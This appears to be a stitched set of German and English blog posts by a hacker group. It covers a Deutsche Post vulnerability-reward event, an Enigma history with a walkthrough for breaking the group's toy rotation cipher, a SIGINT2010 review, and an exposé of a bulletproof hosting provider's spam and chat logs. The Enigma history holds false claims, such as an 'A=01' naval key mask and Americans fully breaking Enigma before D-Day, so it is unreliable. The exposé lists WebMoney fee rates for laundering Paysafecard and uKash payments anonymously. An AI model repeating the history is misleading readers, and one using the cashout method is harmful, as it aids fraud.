Die Preise bei den Events liegen bei 1000€ für kleinere (client-seitige) Sicherheitslücken & bei 5000€ für mittlere – kritische (Persistent or Server-Side; Design)Sicherheitslücken.

Um euch die Spannung zu nehmen, “JA, wir machen mit!”. Gerade bei diesem Event sind es nicht nur die kommerziellen Preise die locken sondern die Möglichkeit etwas dauerhaft zu verändern, was bald voraussichtlich die Zukunft im Bereich, der Kommunikation bestimmt. Aus diesem Grund haben sich X4lt(GE) mit Rem0ve(GE), Emzy(CCC), Static(GE) & Ric0(Flip-Dot) zusammen für diesen Event registriert. Bisher sind uns leider keine Details zugekommen von anderen befreundeten Gruppen die auch teilnehmen möchten.

Hiermit rufen wir alle interessierten Leser (Researcher-,Penetrationtester- & seriöse Hacker) Gruppen dazu auf, sich für diesen SecurityCup Event zu registrieren. Jedes angenommene Researcher Team bekommt einen Startgeld von 3000 EURO. Das Geld bekommt man aber nicht einfach so sondern muss schon Referenzen für eine ernsthafte Teilnahme vorweisen können. Das Geld kann & sollte für Equipment, Software, Scripts & ePost zubehör ausgegeben werden um die Wahrscheinlichkeit eines Treffers zu erhöhen & die Aufwendungen vorab zu vergüten.

Wir waren alle extrem erstaunt von der “DeutschenPost” den sie haben nun genau den richtigen Weg zum Schutz von Infrastrukturen eingeschlagen. Es kommt nicht oft vor das eine so große Bank eine Möglichkeit für unabhängigen Researcher anbietet. Vor allem ist man bei dieser Aktion nicht in einer doppelt abgesicherten Testumgebung unterwegs sondern macht alle Sicherheitstests über das Live-System. Ziel dabei ist es unter anderem eine Sicherheitslücke nicht umbedingt schadhaft auszunutzen sondern eher das Problem zu identifizieren & zu dokumentieren.

Am Ende werden alle Einreichungen an eine Jury übergeben. Diese wertet die Dokumente oder Sessiondaten aus & verteilt dann die Vergütungen. Die Sicherheitslücken müssen alle gut & verständlich dokumentiert sein & klare sowie zutreffende Aussagen beinhalten. Die Jury besteht aus folgenden Personen …

Wer die Webseite besuchen möchte kann dem folgenden Link folgen …
https://www.deutschepost.de/dpag?tab=1&skin=hi&check=yes&lang=de_EN&xmlFile=link1022792_1022790

Wichtige Auflagen für die Teilnahme an der Veranstaltung sind z.B. das alle gefundenen Sicherheitslücken über die DeutschePost angenommen, ausgebessert & veröffentlicht werden. Das willkürliche veröffentlichen führt zu Disqualifizierung der entsprechenden Researcher/Gruppe.

Der Erfinder, der ENIGMA war der deutsche Elektroingenieur Arthur Scherbius (1878–1929) Zur Fertigung der Maschine wurde am 9. Juli 1923 die Chiffriermaschinen-Aktiengesellschaft in Berlin gegründet. Die ENIGMA war zunächst als ziviles Chiffriersystem konzipiert und wurde kommerziell auf Messen – wie 1923 auf dem internationalen Postkongress des Weltpostvereins in Bern, zum Kauf angeboten. Kurze Zeit später zeigte jedoch das deutsche Militär(Wehrmacht) mehr als großes interesse, an dieser Chiffrierungs-Technologie. Der Erfinder & Inhaber, des Patents Arthur Scherbius kam kurze Zeit später(1929) bei einem Unfall mit einer Kutsche ums Leben. Bis heute ist nicht bekannt ob dieser Tot mit dem deutschen Reich auf Grund, Patents in Verbindung steht. Seine Erfindung galt damals als großer Fortschritt im Bereich der Chiffrierung & Kryptographie. Im Jahre 1923 wurde das Patent für die erste ENIGMA von Arthur Scherbius angemeldet.

Die amerikanischen & englischen Truppen hatten es zur damaligen Zeit extrem schwer den Code wegen der wechselnden Schlüssel via Walzen zu knacken. Außerdem waren z.B. extra Kerben, Markierungen & Kennzeichen gesetzt worden wie bei der M4(Typus) die bei der Marine(z.B. U-Boot) genutzt wurde. Die allierten Mächte versuchten vor und während des Kriegs mehrfach mit verschiedensten & sehr kostenintensiven Mitteln an eine aktuelle Enigma zu kommen.

Wie funktionierte die ENIGMA ?

Die Enigma arbeitet mit einem Walzensatz der als Hauptteil des Chiffriergeräts gilt. Strom fließt über eine Batterie ins Steckerbrett und vertauscht dann über die Walze einen gedrückten Buchstaben so, dass bei einer Eingabe von z.B. “A” der Buchstabe “01″ oder”T” heraus kommt. Für jede staatliche Instanz wie z.B. Reichsbahn, Marine, Ämter oder Geheimdienste gab es verschiedene Schlüssel. Die Standardmakse, der ENIGMA M4(Marine) Gebrauchsanleitung war z.B.

A=01 ; B=02 ; C=03; D=04; E=05;F=06;G=07;H=08;I=09

… & kann auf dem zweiten Bild(Gebrauchsanleitung) angeschaut werden. Die Verschlüsslungen konnten beliebig kombiniert und ausgetauscht werden. Diese Tatsache machte es damals schwer einzelne abgefangene Nachrichten nach einem festen Schema zu dechiffrieren, was wohl auch am meisten Zeit in Anspruch nahm.

Wie sicher war die ENIGMA Chiffrierung (1923-1943)?

Die Sicherheit, der verschlüsselten Nachrichten über die ENIGMA war damals von der Geheimhaltung der veränderbaren Walzenverdrahtungen ab. Der Anwender, des Chiffriergeräts konnte die Verdrahtungen nicht verändern und deshalb war ein Teil, des Algorithmus ebenfalls unveränderbar. Von 1923 – 1942 änderten sich die Walzenanzahlen variablen zwischen 3 – 8 & konnten somit mehr Sicherheit gewährleisten. Ein große Schwäche der ENIGMA tritt dann auf wenn ein Gerät den Besitzer wechselt. Dann konnte man mit einer Methode die Walzen umkehren und so den vorab aufgefangenen Nachrichtenverkehr dechiffrieren. Dies ging aber nur dann, wenn die abgefangenen chiffrierten Nachrichten mit der unter Kontrolle gebrachten ENIGMA aus der amtlichen Instanz übereinstimmten. Anfänglich wurden keine Sicherheitsmaßnahmen im Verkehr mit der ENIGMA ergriffen aber nachdem einige Geräte & Pläne über Spione, den Besitzer gewechselt hatten, wurde erst jedes halbe Jahr und dann pro Quartal die Routinen, der ENIGMA verändert.

Wer knackte die ENIGMA ?

Marian Rejewski arbeitete 1932 beim polnischen Chiffrierbüro im Sächsische Palaisin in Warschau für den polnischen Geheimdienst. 1931 wurde er vom polnischen Geheimdienst angeworden & schon 1932 in ein Chiffrierbüro versetzt, wo inoffziell an der Decodierung, der ENIGMA gearbeitet wurde. Als Hauptwerkzeug benutzte er 2 konstruierte elektromechanische Maschinen die automatisiert rechneten und versuchten den aktuellen Tagesschlüssel verschiedenster Instanzen zu errechnen. Das erste Geräte mit dem gearbeitet wurde waren “Bomba“. Der Bomba ist ein Gerät aus 6 polnischen ENIGMA’s weiter entwickelt wurde. In zwei Stunden konnte das selbst erstellte Modell ungefair 17.576 Permutationen (Walzenstellungen) testen und den Tagesschlüssel von Heer und Luftwaffe mit Beaufsichtigung(optische Prüfung) auswinding machen. Auf die heutigen Angriffe bezogen wäre es eine Art Bruteforce Attacke gewesen, weil alle Schlüsselkombinationen durchprobiert wurden, anstatt den Code per Wahrscheinlichkeit zu dechiffrieren.

Das zweite nützliche Gerät war ein Zyklometer was von einigen Mathematikern entwickelt wurde um chiffrierte Funksprüche zu dechiffrieren. Das Zyklometer wurde dann benutzt wenn Bomba den aktuellen Tagesschlüssel per “Bruteforce” ermittelt hatte & eignete sich wunderbar um Funksprüche abzuhören. Obwohl die Schlüssel später also automatisiert(ModelM) abgefragt wurden basiert seine Arbeit auf einem hoch kryptographischem Verständnis und er genießt bis heute höchste Anerkennung bei Krypto-Analysten in aller Welt.

Die hoch intelligenten Angriffsmethoden, des Polen blieben der Öffentlichkeit nicht lange verborgen und so orientierten sich selbst die Amerikaner & Engländer an seinen Vorträgen/Berichten um die Schlüssel permanent zu knacken. Ob das knacken der ENIGMA mit den von einem deutschen Spion zusammenhängt, der an den franzosischen Geheimdienst Material verkauft hatte wird wohl für immer ein Rätsel bleiben. Nach dem Erwerb der Mittel vom französischen Geheimdienst wurde alles an den polnischen und engländischen Geheimdienste weitergeleitet. Dem engländischen Geheimdienst war es trotz der Unterlagen & Bauteile bis Ende 1941 nicht wirklich möglich Nachrichten zuverlässig zu dechiffrieren. Nachdem die Amerikaner, die ENIGMA komplett geknackt hatten konnten Sie ihr wissen am “D-Day”(Operation Overlord) in der Normandie verwenden um höchst mögliche Präzision & Koordination während des Angriffs gegen die deutschen Besatzer freizusetzen. Obwohl das amerikanische & englische Militär viel Geld & Material investierte um die verschiedenen ENIGMA Typen & Codes zu erbeuten, gelang es erst 1941 im Hut6 in Bletchley Park, (Leitung: Gordon Welchman|8.Dezember) alle Codes, der ENIGMA M4/M3/G3 (Marine) zu knacken. Von diesem Zeitpunkt ab war die ENIGMA kein Hindernis mehr für die allierten Truppen im 2.Krieg & alle Nachrichten konnten bis zum Ende des Kriegs abgehört/ausgewertet werden.

Wurde der Kriegsverlauf durch die ENIGMA entschieden oder Beeinflusst?

Einige Schreiber auf Wikipedia & Webportalen behaupten, dass der Krieg nur wegen der geknackten Chiffriermaschine gewonnen wurde. NEIN! Bei einem deutlichen Blick in die heutigen Zahlen & analysierten Fakten kann man dieser Meinung nicht zustimmen, da die deutschen Truppen auch so schon am Ende Ihrer Ressourcen & Koordination waren. Das es den Allierten einen großen taktischen Vorteil erbrachte ist jedoch nicht zu bezweifeln. Natürlich konnten die Amerikaner, Russen & Engländer viel von dem chiffrierten Datenverkehr auswerten und nutzen, die kriegerische Auseinandersetzung wäre aber trotzdem auch ohne ENIGMA schlecht für die Nationalsozialisten ausgegangen. Trotzdem haben die allierten Streitkräfte viele Leben & eine Menge Zeit mit dieser Art, des Lauschangriffs gespart. Die verschiedenen Enigma Typen kann man heute noch im Technikmuseum in Berlin oder im Verkehrsmuseum Berlin betrachten. Da wir 2007 in genau diesem Technikmuseum zu besuch waren haben wir natürlich 1a Fotos gemacht. Das folgende Bild zeigt die Enigma M4 welche von Marine oder Militär genutzt wurde und durch spezielle Walzen, ein Steckerbrett + Markierungen eine etwas bessere Verschlüsslung ermöglichte.

Das erste Bild zeigt die ENIGMA als Typ-M4 von der damaligen deutschen Marine & bietet auf Grund der speziellen Kerben, Steckerbrett & Walzen ein (damals) Höchstmaß an Verschlüsslung im Nachrichtenverkehr. (Foto by ~Rem0ve)

Das zweite Bild zeigt den Text auf der innen-seite der Enigma. Dieser spezielle Text ist in sämtlichen öffentlichen Quellen nur undeutlich oder garnicht zu erkennen. Er beinhaltet die wichtige Gebrauchsanweisung, des Chiffriergeräts. Bei einigen freien Bildern wurden die Metalplatten mit der Gebrauchsanweisung, der Maschinen gänzlich entfernt. Wenn man sich den Gebrauchs-anweisungspunkt Nr.6(Mitte) in einer höheren Auflösung(Zoom) anschaut dem wird ein kreisrunder Abdruck auffallen.

Diese Abdrücke stammen sehr wahrscheinlich von einer Umkehr-Walze die irgendwie mal auf der Klappe gelegen hat. http://upload.wikimedia.org/wikipedia/commons/3/33/EnigmaReflector.jpg

Projekt: Software & Dechiffrierung

Nun kommen wir aber mal zu dem Projekt, was wir zur ENIGMA vor einigen Jahren gemacht haben. 2 Mitglieder aus unserer Gruppe hatten damals ein Konzept & ein Programm zur Enigma geschrieben was z.B. Dateiverschlüsslung, Texte & Zahlen mit Hilfe von simulierten Rotationen verschlüsselt. An sich ist das Projekt sehr interessant weil der Source direkt im Programm verfügbar ist. Wer aber möchte kann sich selber mal im knacken des Rotations Rythmus versuchen ohne den Source vorher anzuschauen. Wer es schafft eine automatisierte Routine zu schreiben oder den Code auf einem Blatt Papier mit der Software zu knacken, kann sich gerne per code-paste in den Kommentaren auslassen. Interessant ist bei der Software, dass man sie für Schulungszwecke perfekt benutzen könnte da man damit die ersten Schritte(Basics) bei Codebreakern überprüfen/testen könnte. Eine Person die den Code vorher nicht kannte und mittlere Vorkenntnisse hatte konnte das Program nach 11 Stunden komplett dechiffrieren und automatisiert entschlüsseln. Natürlich ohne auf den verlinkten Source zuzugreifen. Um es ein wenig spannender zu machen haben wir natürlich noch eine Verschlüsslung für Dateien implementiert. Das Programm ist einfach gehalten kann Dateien & Anhänge verschlüsseln. Das Programm verfügt über 3 festgelegte Rythmen die man über Rotationen benutzen/kombinieren kann.

Die folgenden Bilder stammen aus der Bearbeitungsphase, der Programmoberfläche …

Es folgen zwei Downloads einmal die einzelne Software & dann noch das komplette Paket mit allen Daten am Ende(Source, Routine & Projekt).

Download: Software
Download: Complete Package

Wie bricht man die Chiffrierung (Verschlüsslung)in der vorgegebenen Software?
Als aller erstes stellt man einmal fest, ist die Verschlüsslung in der Software konstant(fest) oder ist sie generiert/berechnet.

Das lässt sich feststellen indem man 2 mal die gleiche Eingabe verschlüsselt mit einem Rotor. Wenn dabei 2 mal das gleiche raus kommt weiss man, dass der Wert fest vergeben ist. Um das zu verifizieren versucht man es natürlich noch ein drittes mal. Danach macht man das gleiche mit Rotation 2 & Rotation 3.

Man kann mit der software zwar den konstant vergeben wert von generiert & berechnet trennen(per Eingabe) aber nicht das generiert oder brechnet von einander. Es würde also optisch keine Unterschied machen ob man nun von einem berechneten Wert Zahlen/Buchstaben sehen oder ob man einfach generierte per zufall sieht. In diesem Falle könnte man beim Entschlüsseln nicht sehen ob eine Chiffrierung fest vergeben ist pro Rotor oder nicht. Bei der festen Vergabe allerdrings kann man den Code in wenigen Stunden komplett entschlüsseln, wenn man an die Software ran kommt. Das amerikanische, engländische & russische Militär verfolgte natürlich die gleiche Stategie zwischen 1939 bis 1941, wo die Chiffrierung am Ende komplett geknackt war.

Man nimmt sich ein Blatt und fängt an die einzelne Eingaben zu machen wie z.B. A=? ; B=?; C=? … nachdem man den ersten Rotor checked findet man heraus das dieser die Buchstaben einfach in Zahlen umwandelt. Den für A B C D steht bei Rotation1 A=01; B=02; C=03; D=04. Wenn man seine Maske auf dem Netz-Blatt nun mit den Tastaturzeichen Testet wird man am Ende bei Rotation1 eine komplett neue Dechiffriert Maske erhalten.

Rotation 1:
a = 01
b = 02
c = 03
d = 04
e = 05
f = 06
g = 07
h = 08
i = 09
j = 10
k = 11
l = 12
m = 13
n = 14
o = 15
p = 16
q = 17
r = 18
s = 19
t = 20
u = 21
v = 22
w = 23
x = 24
y = 25
z = 26
1 = 0a
2 = 0b
3 = 0c
4 = 0d
5 = 0e
6 = 0f
7 = 0g
8 = 0h
9 = 0i
0 = 0j

Auf Rotation 1 ohne kombination wurde das Wort “hallo” chiffriert 0801121215 heißen. Erste Rotation haben wir schonmal geknackt war auch relativ einfach wenn man nicht die Berechnungstricks umgeht und indem man den schnellen Weg wählt. Nun kommen wir zur zweiten Rotation. Um als erstes festzustellen um die Werte auch hier konstant vergeben werden … testen wir mit unseren einfachen und beliebten Methode indem wir einfach 3 Eingaben verschlüsseln. Wie wir festellen werden ist auch diese chiffrierte Ausgabe konstant vergeben. Nun legen wir uns wieder eine einfache Netz-Maske und zeichnen die Eingaben für alle aufm dem keyboard anfallenden Zeichen an. Am Ende haben wir herausgefunden das A B C D chiffriert für A=ghi; B=dmp; C=klz; D=iso; steht. Nach wenigen Minuten haben wir eine nette Maske erstellt …

Rotation 2:

a = ghi
b = dmp
c = klz
d = iso
e = nke
f = fqy
g = vel
h = zek
i = dew
j = psi
k = pxh
l = asm
m = uts
n = qda
o = kla
p = dak
q = heu
r = jub
s = mvc
t = cyw
u = qlm
v = dar
w = raz
x = ioz
y = mzu
z = wlb
1 = tmp
2 = ujd
3 = ksz
4 = bpe
5 = yte
6 = qpb
7 = fgv
8 = pqe
9 = dsk
0 = tpq

Nun tun wir das gleiche noch mit der letzten Maske und erhalten z.B. …

Rotation 3:

a = 4618
b = 8122
c = 5125
d = 6124
e = 1692
f = 5921
g = 7751
h = 6614
i = 6265
j = 7501
k = 8691
l = 9592
m = 0024
n = 6813
o = 8591
p = 7602
q = 8575
r = 3125
s = 5142
t = 8251
u = 1157
v = 2151
w = 5821
x = 9915
y = 2061
z = 6021
1 = b1z5
2 = z9v2
3 = s5g0
4 = j8c6
5 = b4r2
6 = m1h9
7 = x3c5
8 = r7w8
9 = q2a7
0 = i3e2

Kombinierte Rotation dechiffrieren?

Wer sich nun denkt das er die komplette Verschlüsslung schon gebrochen hat muss vorerst noch bedenken, dass es wichtig ist auch kombinierte Chiffrierungen zu testen. Es könnte ja sein, das ein Sender eine doppelte oder dreifache Rotation in einer Nachricht verwendet & der Empfänger die standard Rotationsfolge kennt.

Sender – Kombinierte Eingaben:

Also machen wir die Eingabe im Programm … “Hallo” und erhalten “0801121215“(chiffriert rotation 1)

Nun nehmen wir als potenzieller Sender eine weitere Rotation vor. Wir kombinieren den chiffrierten Zahlencode aus Rotation1 mit der Rotation3 & erhalten vollgende Ausgabe …

“i3e2r7w8i3e2b1z5b1z5z9v2b1z5z9v2b1z5b4r2“(chiffriert rotation 3).

Angreifer – Merkmale & Maske:
Da die Angreifer meistens die Funksprüche mit zyklometern abhören konnten, fangen wir in diesem scenario die obere letzte Nachricht verschlüsselt ab. Wir wissen nun aus unseren 3 Netz-Masken woran wir welche Rotation erkennen können, durch die erbeutete Enigma(Software|Example) versuchen wir nun den aktuellen Tagesschlüssel(Rotation) zu knacken.

1. Rotation 1 enthält nur Zahlen die mit A=01 fortlaufenden beginnen. Merkmal: 2 Zahlen
2. Rotation 2 enthält nur Buchstaben die mit A=ghi nicht forlaufend(random) beginnen. merkmal: 3 Buchstaben
3. Rotation 3 enthält Zahlen, Buchstaben & mix Zahlenfolgen. Merkmal: 4 zeichen & Ab zahlen – Buchstaben & Zahlen

Wir nehmen uns nun mit Hilfe, der Netz-Maske einfach einen verschlüsselten Text vor der wie folgt aussieht …

“b1z5z9v2i3e2b4r2i3e2b1z5b1z5r7w8b1z5j8c6 i3e2r7w8b1z5b4r2z9v2s5g0 z9v2i3e2b1z5b4r2 i3e2z9v2b1z5r7w8i3e2b4r2i3e2b1z5b1z5b1z5 i3e2b1z5
i3e2z9v2i3e2b1z5b1z5q2a7i3e2q2a7i3e2s5g0 i3e2s5g0b1z5b4r2i3e2j8c6i3e2b4r2”

Wie wir sehen und im Program schon getestet haben wissen wir das die letzte ein Mix-Rotation ist. Wir schauen in die Merkmale(3.) und finden heraus, dass es nur Rotation 3 sein kann weil nur dort Zeichen und Buchstaben verwendet werden. Wir nehmen nun die Netz-Maske und dechiffrieren den verschlüsselten Text und erhalten dabei den folgenden String(chiffriert)

“1205011814 081523 2015 0218050111 01 0201190903 03150405”

Nun schauen wir uns den String an und vergleichen ihn mit den 3 möglichen Merkmalen. Wie wir sehen kann es nur noch die Rotation 1 sein weil nur diese einfach Zahlen besitzt. Wir nehmen also die Netz-Maske von Rotation1 die wir entschlüsselt haben und ersetzen die Zahlenkette durch die entschlüsselten Buchstaben. Wir erhalten folgenden Text: “learn how to break a basic code” Nun kann man sich noch entscheiden ob man alles automatisiert mit ein wenig Zeitaufwand so gestaltet, dass wenn man einen Text einträgt er die Rotation erkennt und dann die jeweiligen Texte so lange ummodeliert bis der richtige Text auf dem Bildschrim erscheint. Die Attacke kann man mit Koordinaten oder mit einem Wörterbuch nochmals kombinieren werden damit man ohne zu überprüfen später bei einem sinnvollen Wort ein dechiffrierten Text automatisiert am Ende bekommt. Wenn man z.B. eine Wörterbuch attacke macht würden die wörter break, basic & code zu 99% am Ende dort stehen. Diese beiden Wörter wurden als erstes von unserer Testperson identifiziert. Diese Art von Angriff ist aber nur da sinnvoll wo man weiss was für eine Nachricht vom Empfänger entsendet wurde.

Es könnten theoretisch auch Signale oder Frequenzen sein die übertragen werden. Damals natürlich eine noch undenkbare Methode, den Code zu knacken weil man damals

nicht den Stand von heute hat. Sollte ihr jedoch den alten Weg wählen empfehle ich euch zu bedenken das Ihr bisher nur eine feste routine dechiffiert habt und das automatisierte etwas mehr an Aufwendung umfängt. Wer nun noch prüfen möchte ob er verstanden hat wie man nur mit der Verschlüsslungsfunktion sehen kann wie man den Code schnell brechen kann sollte sich mal bei dem folgenden Beispiel versuchen … http://www.java-fun.de/java/scripts/sicherheit/krypt.htm Krypt chiffriert per Javascript einen Texte in Zahlenzeichenketten. Die stabile Zahlenverschlüsslung basiert auf dem gleichen Technik einer einzigen Rotation & kann in wenigen Minuten per Netz-Maske komplett dechiffriert werden.

Beispiel:

1173750481049711810137504898114111107101110375048116104101375048110117

1099810111437504897108103111114121116104109

An sich hat uns das Projekt viel Spaß gemacht, dass war auch ein Grund warum wir es nachträglich den Lesern zugänglich machen. Eine nette Programmversion wurde der privacy website bei cyberarmy an rose übermittelt um einen Aufsatz für Chiffrierung in England zu vervollständigen. Vor einigen Tagen wurde bekannt das in Bletchley Park alle ENIGMA Dokumente digitalisiert werden sollen. Dazu werden freiwillige gesucht die ggf. mit Scannern kostenlos versorgt werden. Noch mehr Informationen & einige interessante Bilder könnt ihr bei Wikipedia finden. Die Bilder von ~rem0ve wurden zur Vervollständigung an das Wikipedia  Archiv weitergeleitet.

[Writer: ~Rem0ve & ~X4lt]

The impression from the event was the following …
Instead of forming groups from hacktivist and hackers people came to this event to vent their opinion on different subjects and decisions from the state. This to try and get people to stand up against these decisions. This in opposite of just showing of found vulnerabilities or technical details and such. In particularly the talks about censorship were annoying at this event as they have been done to many times at CCC related events. Most people also couldn’t agree this year on whether there are more politically technical or industrial technical group formations. Tough one thing must be said in addition to that, the main reason for this is basically because the main event organizer CCC isn’t neutral themselves. The most topics are in line with all other topics from events done by CCC. Even though some of the presentations missed their goal a few of them were still a bit interesting.

Most interesting and worth a notice are for example …

Day 1:
Identitäts-Kriege: vom Ende menschlicher Gesellschaftsform
Attack vectors against mobile devices
Misstraue Autoritäten – fördere Dezentralisierung?

Day 2:
Das überwachte Netz
Malware Joe Blobs
Botnets in 2010

Day 3:
Opensource policies for governments

The following topics were either bad or boring …
Kommunismus oder Kommunitarismus? Voraussetzungen – Neues Urheberrecht
Der Abmahnwahn in Deutschland
Die Kirche im Staat lassen
Auf der Überholspur zum Stoppschild
Volkszaehler Beitrag
Das überwachte Netz
Police State

About one presentation we would like to say something … Women and Geek Culture – What’s the problem, guys?
At the presentation information at the website it stated …

“The biggest enemy of hackerspaces and techshops is probably girlfriends and wives”.
… & degree of sexism in the different fields and finally finding some strategies to better integrate women into geekery.

So after I had read that, I’ve wondered with what background idea they wanted to try and justify the none negotiable moral values.
If only hang out with the old-established generation, one should not wonder when 90% of the people who don’t know otherwise are discriminating. Women have the same rights in becoming a hacktivist/geek/nerd/gamer/cracker/coder without any restriction.
So there is no point trying to generate respect from male geeks / hackers at SIGINT2010 and later editions to justify that fact.

People who don’t want to evolve out of being a digital Neanderthaler and try and limit other people with idiotic sexism and other restrictions, are found in all walks of life.
It would be more useful to mobilize people instead of telling them that certain things are bad. This because if u mobilize enough people other groups can no longer ignore the mobilized group.
However, some skills surpass the normal geek motivations and driving forces. Especially the acting instead of explaining why it’s bad results in change or recognition.
This in addition to the enthusiasm for a meaningful idea and being motivated and striving to create something.
Apart from this all is SIGINT2010 the wrong event for this kind of subject mainly because of the fact that the comprehension for women and technology is already at CCC.
-

At the second day around 21 O clock there was an interesting private party in a nearby hotel room. Where a few good interesting sessions & prv workshops were held.  On one of the video walls 3 DVDs were showed from different groups. Containing demos, new prv stuff and interesting Advisories and vulnerabilities.  Also from a group who wants to stay secret there was a presentation about a complex vulnerability-lab project with a demo video of their project which is soon to go live.

All by all my weekend was fine, though like many other people i found the content of the event was not that good.
Nevertheless, we are definitely on the next SIGINT in 2011 (SIGINT2011) with an interesting presentation with a topic about: “Hacktivism 2010/2011 – Political Hacktivists”.

Greetz:
SiFU, Mariuz CANI, Benny CCC Gießen, Olivia, der typ mit dem teuren Projektor, Daniela Queen of SQL, David v. K., berni, m0Z, my Team & the famous hacking rest we guess …

[Writer: ~Rem0ve & ~X4lt]

Delivered-To: *@gmail.com
Received: by 10.204.82.149 with SMTP id b21cs20bkl;
Fri, 14 May 2010 23:00:09 -0700 (PDT)
Received: by 10.143.26.21 with SMTP id d21mr1381706wfj.225.1273903207989;
Fri, 14 May 2010 23:00:07 -0700 (PDT)
Return-Path:
Received: from box1.ddoshostingsolutions.com (ddoshostingsolutions.com [67.220.67.50])
by mx.google.com with ESMTP id 15si4116103pzk.121.2010.05.14.23.00.07;
Fri, 14 May 2010 23:00:07 -0700 (PDT)
Received-SPF: neutral (google.com: 67.220.67.50 is neither permitted nor denied by domain of promotion@safetyhost.org) client-ip=67.220.67.50;
Authentication-Results: mx.google.com; spf=neutral (google.com: 67.220.67.50 is neither permitted nor denied by domain of promotion@safetyhost.org) smtp.mail=promotion@safetyhost.org
Message-Id: <4bee3867.8f13f30a.2039.4237SMTPIN_ADDED@mx.google.com>
Received: from [92.241.164.47] (helo=bie)
by box1.ddoshostingsolutions.com with esmtpa (Exim 4.67)
(envelope-from
)
id 1ODAPt-0003wY-TB
for *@gmail.com; Fri, 14 May 2010 23:00:06 -0700
From: “SafetyHost”
Subject: Offshore Webhosting
To: *@gmail.com
Content-Type: text/plain;
Reply-To: promotion@safetyhost.org
Date: Sat, 15 May 2010 08:00:04 +0430
X-Priority: 3
X-Library: Indy 8.0.25

Sehr geehrter Kunde,
seit ein paar Wochen nun konnten wir uns auf dem Markt etablieren !

Wir bieten Ihnen ein sehr sicheres Hosting für illegalen oder grenzwertigen Inhalt. Unsere Server stehen im Wahome Data Center (Russland). In diesem Bezirk hosten übrigens auch fast 90% aller deutschen Hacking Foren sowie knapp 80% aller Warez Seiten.

Auf unseren Webspace-Servern erlauben wir FAST alles, hier eine Liste mit kleinen Ausnahmen:
- Kinderpornografie

Wir bieten 101% Anonymität und Sicherheit für ihr Projekt. Geben sie bei der schlanken Anmeldung auf unserer Website ruhig mit gutem Gewissen falsche Daten an, denn es hat ja keinen zu interessieren wer Sie wirklich sind und was Sie im Internet treiben !

Als Zahlungsmethode akzeptieren wir die völlig anonyme und sichere Methode der Wertkarten in Form von Paysafecard/uKash, diese bekommen Sie nahezu an jeder Tankstelle oder im Drogeriemarkt sowie an vielen anderen Verkaufstellen. Schauen Sie doch mal bei uns vorbei und überzeugen Sie
sich gleich von unseren günstigen Angeboten,

http://safetyhost.org/

Mit freundlichen Grüßen,
Torben Schneider
—-

Now some readers will surely think of how far it has come already. He offers us as a hosting provider to host any illegal activities, also he says that 90% of all Russian & German hacking crews are active there. Next to this he then gives us a URL to his site and also says that we can pay by PSC / uKash.

Why these two payment methods are used by Carders & Fraud Freaks?
Paysafecards (DE) / uKash (RU), these are like phone cards as you can buy them anonymously at the gas station. So ideal for any hackers, crackers and illegal providers in the world needing a anonymous payment method. This as you can transfer without problems with any other WebMoney program so that you end up the money from on a Debit cards, Western Union account or other cashout/resell mehod. Three advantages. The money can be transfered usually with only a minor loss of a few pennies.

Aktuelle Gebühren per WebMoney:
Paysafecard -> WME = 10 % Gebühr
Paysafecard -> WMZ = 12 % Gebühr
Ukash -> WME = 12 % Gebühr
Ukash -> WMZ = 14 % Gebühr

Abuse & Police

The hoster has so no direct contact with its customers. So if someone gets acussed of abuse the hoster can just say he is only the hoster and clears the eye-catching “customers”. So 90% of all offenses that reach the illegal Hoster will be dismissed because he the hoster says he fixed the problem. In addition to the easy “clean-up” action it is hard to address the hoster as its located at “Wahome Data Center” in Russia.

In a brief private conversation, you could be convinced by the various illegal activities that are allowed and supported.

—
Hi, habe dein Mailing erhalten, war das von dir ?

Torben S* 18:02:57
das kann ich ihnen nicht sagen, wir verfügen über mailing listen von knapp 5 mio mails

Torben S* 18:04:05
ja diese mail wurde von uns versandt

Guest 18:05:16

Mhhh gut … also mietet/vermietet ihr deticated maschinen in ru + verpachtet illegale webserver, server an
die kunden & macht auch noch das angebot … das fragwürdiger oder illegaler content dort benutzt wird ?

Torben S* 18:05:14
wir dulden fast alles

Guest 18:05:40
ich suche einen neuen server
habe im mom einige bot tests am laufen und benötige was teures aber dafür gutes

Torben S* 18:06:20
wir haben eigenes rack

As you can see it has now become normal that people focus on illegal activities across national borders. But he who thinks he would be anonymous because he is located in the Russian Federation should be disappointed. The response is like always only a matter of time. This until other foreign authorities take action or force the local authories to take action.

The owner of “safetyhost.org” didn’t discover a new type of business, but appart from that they will expand their services on to address more customers this depending on the amount of money available for the company.

On one side a user you wants to anonymously use his domain, server, operating, hosting but on the other side, these kind of people
to open up to much opertunities for other illigal activities. For instances it allows providers to conduct illegal transactions within “our” infrastructure and because of their position they evade the justice system.

So if you now say you should protect the right to anonymity … think about the future first and come up with a solution that also restricts hoster / provider as it clearly doesn’t at the present.

Also in the conversation the available server options were offered…

e8400 Intel Core 2 Duo
Semi-managed Linux dedicated server with NO SETUP FEE
* e8400 Intel Core 2 Duo * 2GB DDR2 RAM
* 160GB SATA HDD * 2000GB Transfer
* Centos operating system (others available on request)

Pentium 4 2.66GHz
Semi-managed Linux dedicated server with NO SETUP FEE
* Pentium 4 2.66GHz * 1GB DDR2 RAM * 80GB SATA HDD
* 1000GB Transfer
* Centos operating system (others available on request)

X3350 Quad Core Xeon
Semi-managed Linux dedicated server with NO SETUP FEE
* X3350 Quad Core Xeon * 4GB DDR2 RAM
* 500GB SATA HDD * 3000GB Transfer
* Centos operating system (others available on request)

Q8200 Core 2 Quad
Semi-managed Linux dedicated server with NO SETUP FEE
* Q8200 Core 2 Quad * 2GB DDR2 RAM
* 160GB SATA HDD * 2000GB Transfer
* Centos operating system (others available on request)

As the serverlist already show they own sufficient capacity to host any illegal activities also they are normaly priced (100-150€).
After this we asked….

Guest 20:49:48
wie schaut das bei euch mit abuse oder cops ?

Torben S* 20:49:51
das wäre unser vorschlag

Torben S* 20:50:01
wenn sie zufrieden sind dann kaufen sie mehr
abuse und cops werden ignoriert

Torben S* 21:08:17
haben sie vor noch heute zu bestellen oder wollen sie das morgen tun ?
wir würden wenn sie uns paysafecard senden heute noch einen root aufsetzten
sodass sie sofort loslegen können
—

Sometimes it is so, so that the host work together with the resellers and attacks by administrators simply be ignored or that the reseller is devalued by one. To cover up the crime. In this scenario the real Starfverfolgungsbehörden in Germany are bound by rules, whether they like it or not.

The only one who could do something about it would be the provider or ISP. It seems that some people in the Data Center Wahome are very comfortable and possible planning some evil projects for the future.

[Writer: ~X4lt & ~Rem0ve]

Delivered-To:
******@gmail.com

Received:
by 10.204.33.5 with SMTP id f5cs27948bkd;
Sat, 8 May 2010 21:25:08 -0700 (PDT)

